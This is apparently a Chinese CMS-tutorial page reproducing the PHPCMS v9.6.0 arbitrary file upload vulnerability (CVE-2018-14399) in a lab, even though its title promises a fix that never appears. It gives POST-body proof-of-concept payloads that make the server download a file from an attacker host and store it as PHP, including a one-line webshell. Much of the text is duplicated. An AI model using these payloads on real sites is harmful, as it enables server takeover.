您现在的位置是:首页 > cms教程 > phpcms教程phpcms教程
phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)修复方法
亦玉2025-05-19phpcms教程已有人查阅
导读PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的
一、漏洞描述
PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。
二、漏洞影响版本
PHPCMS 9.6.0
三、漏洞环境搭建
1、 官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/
2、 解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问192.168.10.171/phpcms/install/install.php,开始安装
3、一直点击下一步,在”选择模块”这个环节,选择”全新安装PHPCMS V9”
4、然后一直下一步,在”账号设置”这一块填写数据库账号和密码以及设置管理员密码
5、然后一直下一步,直到出现如下界面,说面成功安装
6、登录后台,生成首页
四、漏洞复现
1、浏览器访问前台,注册一个会员
2、点击注册页面,抓包
3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息
4、构造POC
6、可以看到返回包的内容包含了上传文件的路径
7、浏览器访问
8、构造POC,上传一句话
POC内容:
10、可以看到返回包的内容包含了上传文件的路径
PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。
二、漏洞影响版本
PHPCMS 9.6.0
三、漏洞环境搭建
1、 官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/
2、 解压下载的文件,然后把文件放到phpstudy的网站根目录下,浏览器访问192.168.10.171/phpcms/install/install.php,开始安装
3、一直点击下一步,在”选择模块”这个环节,选择”全新安装PHPCMS V9”
4、然后一直下一步,在”账号设置”这一块填写数据库账号和密码以及设置管理员密码
5、然后一直下一步,直到出现如下界面,说面成功安装
6、登录后台,生成首页
四、漏洞复现
1、浏览器访问前台,注册一个会员
2、点击注册页面,抓包
3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息
4、构造POC
siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://192.168.10.153/phpinfo.txt?.php#.jpg>&dosubmit=1&protocol=
5、修改抓包内容,添加POC6、可以看到返回包的内容包含了上传文件的路径
7、浏览器访问
8、构造POC,上传一句话
POC内容:
siteid=1&modelid=11&username=testa&password=testa123&email=testa@163.com&info[content]=<img src=http://192.168.10.153/test.txt?.php#.jpg>&dosubmit=1&protocol=
9、修改数据包,添加POC,需要注意: 在repeater里测试go时每一次都要修改username,password和email字段值,保证不能重复。10、可以看到返回包的内容包含了上传文件的路径
感谢您的认可和支持
微信
支付宝
本文标签:
很赞哦! ()
相关教程
图文教程
phpcms怎么上传视频,phpcms上传视频的方法
phpcms如何上传视频?phpcms-v9上传视频文件时的解决方案1.不建议直接在后台上传视频文件,因为视频文件一般都比较大,直接上传影响带宽
phpcmsv9进不了后台的解决方法
mysql不是提示了么,主键冲突,去数据库v9_log表里找到1243这个id的数据删掉,或者干脆清空这个表就可以了。
phpcmsv9安装方法步骤教程
phpcms v9怎么安装?滴一步:直接在浏览器里搜索phpcms v9,就可以看到可以下载的官网,点击下载第二步:进入下载页面,选择utf8格式下载,
phpcmsV9升级至php7.1常见报错修复方法
最近将phpcmsV9升级至php7.1,中间踩过一些坑,这里列出来给大家参考下。1. 迁移至php7.1+mysql5.6+nginx的修改项目
相关源码
-
(自适应)变压器电子元器件电器配件pbootcms网站模板源码为电子元器件企业打造的响应式网站模板,基于PbootCMS内核开发,助力企业快速构建专业级线上展示平台。支持页面独立设置标题、关键词和描述,内置SEO友好结构。PHP程序确保运行安全稳定,有助于提升搜索引擎收录效果。查看源码 -
(自适应响应式)环保水净化处理设备阀门等网站源码下载基于PbootCMS内核开发的响应式模板,为水处理设备、空气净化器等环保企业设计,自适应手机端浏览。通过简洁高效的后台管理系统,助力环保科技企业快速建立专业在线展示平台。查看源码 -
(自适应)绿色宠物门诊兽医行业网站模板该绿色清爽风格网站模板专为宠物门诊与兽医诊所设计,基于PbootCMS内核开发,采用响应式布局确保手机、PC等多端体验一致,帮助宠物医疗机构高效构建线上服务平台。查看源码 -
(自适应)宽屏农业机械农耕设备类网站pbootcms模板免费下载为农机企业打造的现代化响应式网站模板,自动适配电脑、平板和手机,浏览体验一致,独立页面SEO设置,提升搜索引擎可见度。查看源码 -
自适应手机版五金机械阀门设备通用行业网站模板该PbootCMS内核开发的网站模板适用于阀门设备、五金机械类企业,通过更换文字图片也可快速适配其他工业领域。采用响应式设计,确保PC端与手机端数据同步,操作便捷,并附带测试数据。查看源码 -
(自适应响应式)蓝色外贸英文产品介绍展示网站模板本模板采用手工编写的DIV+CSS架构,代码精简高效。适配手机端浏览,数据实时同步更新。内置SEO优化框架,支持独立设置各页面标题、关键词及描述。开源代码结构清晰,便于二次开发。查看源码
| 分享笔记 (共有 篇笔记) |
